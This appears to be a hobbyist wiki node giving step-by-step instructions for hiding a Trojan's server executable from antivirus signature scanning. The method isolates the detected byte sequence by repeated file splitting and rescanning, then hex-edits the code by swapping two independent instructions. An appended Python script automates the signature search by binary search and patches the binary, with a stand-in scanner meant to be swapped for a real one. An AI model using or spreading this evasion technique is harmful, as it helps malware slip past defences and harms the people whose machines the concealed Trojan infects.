Let's face it, decent information on this trade has become as difficult as the second to last screen in level 8-4 of Super Mario Brothers... You know, the one that required running under the Hammer Brother and jumping over the infamous lava pit of death! I am assuming in noding this that E2 can handle this sort of information. Also, not unlike an informational suicide node may state, I believe it is important to have the information out there. So here's a step by step, 'cuz it's something that everyone might as well know.



You will need ... a copy of the Trojan's server.exe, an antivirus program that you can run on demand over a directory, a file splitter, a hex editor, and Microsoft's DOS 'debug' (all of which get used below).

Begin by creating a new directory and placing your Trojan server.exe in it. Subsequently, run an AV over the directory... it should flag the executable as the Trojan. (If it doesn't, you have nothing to hide from and can stop here.)
Then use the file splitter to cut your exe into separate 1 MB sections and repeat running your AV over the directory. It should, again, flag one of the files as the Trojan. It is possible for two of them to be flagged, which means the scanner carries more than one signature for this thing; if so, you get to do the rest of this for each one.

Feel free to /dev/null-ify the other files.

Keep right on splitting that (now 1 MB) partial.exe into smaller and smaller sections, each time keeping only the piece the AV still flags, 'til you get it down to something tiny but still large enough to trigger the antivirus.
When it arrives at about 24 bytes, delete the last byte and run your AV... then delete the new last byte and run it again... and repeat 'til the AV fails to recognise it.

Example:

... 93 05 B4 4A CD 21 ~ Spotted as Trojan
... 93 05 B4 4A CD ~ Spotted as Trojan
... 93 05 B4 4A ~ NOT spotted as Trojan


Then put back the byte you just removed, since that one was needed...

... 93 05 B4 4A CD

... and do the same thing from the other end, deleting the first byte each time:

22 23 51 8C DB 8E C3 ... ~ Spotted as Trojan
23 51 8C DB 8E C3 ... ~ Spotted as Trojan
51 8C DB 8E C3 ... ~ Spotted as Trojan
8C DB 8E C3 ... ~ NOT Spotted as Trojan


Again, put back the last byte you removed.

Now you should have the smallest number of bytes (maybe about 12) that the AV program will recognize as being the Trojan. Congratulations, you just found the viral signature. /Insert happy emoticon here

Now you need to find where that sequence of bytes occurs in the original .exe (your hex editor's search will do it); let's say it is at offset 0D98:0348.

Load your server.exe into Microsoft's 'debug' program with the DOS command 'debug server.exe', then unassemble starting at that offset with 'u 0D98:0348'. The 12 signature bytes (plus the 21 that follows them, which completes the last instruction):

51 8C DB 8E C3 8B 1E 93 05 B4 4A CD

disassemble to:

0D98:0348 51 PUSH CX
0D98:0349 8CDB MOV BX,DS
0D98:034B 8EC3 MOV ES,BX
0D98:034D 8B1E9305 MOV BX,[0593]
0D98:0351 B44A MOV AH,4A
0D98:0353 CD21 INT 21


Side note:
PUSH CX pushes the CX register onto the stack; the following instruction MOV BX,DS reads DS and writes BX, and alters neither CX -nor- the stack. Neither instruction depends on the other, so it is fairly safe to assume we can swap these two and it won't make a difference to the execution of the program... provided nothing in the program jumps to the address in between them (0D98:0349 before the swap) and those bytes aren't also used as data somewhere. Keep in mind what this buys you: three bytes that no longer match the pattern, which beats a plain byte-string signature and nothing more. A scanner that hashes the file, emulates the code, or carries a second signature elsewhere in the binary will still catch it.

So ...

we hexedit '51 8C DB 8E C3' into '8C DB 51 8E C3', so that this:

0D98:0348 51 PUSH CX
0D98:0349 8CDB MOV BX,DS
0D98:034B 8EC3 MOV ES,BX

becomes this:

0D98:0348 8CDB MOV BX,DS
0D98:034A 51 PUSH CX
0D98:034B 8EC3 MOV ES,BX

Run the AV over the directory one last time; it should no longer recognise server.exe. If it still does, there is another signature in there and you go back to the splitter.
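The whole procedure, from the byte-chopping in the first half of this writeup to the instruction swap just above, boils down to two things: find the shortest byte range a black-box scanner still flags, then rewrite those bytes without changing what the code does. The following is an added example, not part of the original writeup and not any real scanner's code. It generalises the manual method: instead of chopping one byte at a time it binary-searches for each end of the signature, which takes a couple of dozen scans instead of thousands. toy_av (a stand-in that "knows" only the 12-byte signature above) and SAMPLE (a constructed file with that signature buried in filler) are assumptions made up for the example; with a real AV you would replace toy_av with something that writes the buffer to a file and runs the on-demand scanner on it.

```python
from __future__ import annotations
from typing import Callable

Oracle = Callable[[bytes], bool]

# Constructed stand-in for the antivirus. It "knows" exactly one signature: the
# 12 bytes the writeup ends up with. A real scanner is a black box; replace
# toy_av with a function that writes `data` to disk, runs the on-demand scanner
# over it and returns whether the file was flagged.
SIGNATURE = bytes.fromhex("51 8C DB 8E C3 8B 1E 93 05 B4 4A CD")

# Constructed stand-in for server.exe: filler either side of the signature, with
# the "22 23" and "21" neighbours shown in the writeup. The filler contains no
# second copy of the signature, so there is exactly one thing to find.
SAMPLE = (bytes(range(256)) * 4 + bytes.fromhex("22 23") + SIGNATURE
          + bytes.fromhex("21") + b"\x90" * 64)


def toy_av(data: bytes) -> bool:
    """Pretend scanner: flags the buffer iff the signature occurs in it."""
    return SIGNATURE in data


def minimise_signature(data: bytes, av: Oracle) -> tuple[int, bytes]:
    """Find the shortest contiguous byte range the scanner still flags.

    Same idea as the writeup (chop bytes off the end until detection stops, put
    the last one back, then the same from the front) but each cut point is
    found by binary search. This relies on the same assumption the manual
    method does: detection is one contiguous byte pattern, so if a prefix is
    flagged every longer prefix is flagged too. Hash- or emulation-based
    detection breaks that, and this will not converge on anything meaningful.
    Returns (offset_in_data, minimal_bytes).
    """
    if not av(data):
        raise ValueError("scanner does not flag the input; nothing to minimise")

    # Smallest prefix length `end` such that data[:end] is still flagged.
    lo, hi = 0, len(data)
    while lo < hi:
        mid = (lo + hi) // 2
        if av(data[:mid]):
            hi = mid
        else:
            lo = mid + 1
    end = lo

    # Largest start offset `start` such that data[start:end] is still flagged.
    lo, hi = 0, end
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if av(data[mid:end]):
            lo = mid
        else:
            hi = mid - 1
    start = lo
    return start, data[start:end]


def swap_adjacent_instructions(data: bytes, offset: int,
                               len_a: int, len_b: int) -> bytes:
    """Return a copy of `data` with the `len_a`-byte instruction at `offset`
    and the `len_b`-byte instruction right after it exchanged.

    Only safe when the two instructions are independent (neither reads or
    writes state the other touches) and nothing jumps to the address between
    them; the caller has to check that in the disassembly, as the writeup does.
    """
    a = data[offset:offset + len_a]
    b = data[offset + len_a:offset + len_a + len_b]
    return data[:offset] + b + a + data[offset + len_a + len_b:]


def demo() -> dict:
    """Run both steps on the constructed sample and report what a practitioner
    looks at: where the signature is, what it is, how many scans it took, and
    whether the instruction swap actually defeats the scanner."""
    scans = 0

    def counting_av(data: bytes) -> bool:
        nonlocal scans
        scans += 1
        return toy_av(data)

    offset, sig = minimise_signature(SAMPLE, counting_av)
    # The signature starts with PUSH CX (1 byte) then MOV BX,DS (2 bytes);
    # exchange them exactly as the writeup's hex edit does.
    patched = swap_adjacent_instructions(SAMPLE, offset, 1, 2)
    return {
        "offset": offset,
        "signature": sig.hex(" "),
        "scans": scans,
        "detected_before": toy_av(SAMPLE),
        "detected_after": toy_av(patched),
        "patched_head": patched[offset:offset + 5].hex(" "),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Note the check at the end: the patched buffer is rescanned rather than assumed clean. Against a scanner with a second signature, or one that does not work on a fixed byte pattern at all, detected_after stays True and the only honest answer is to go back to minimise_signature on the patched file.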

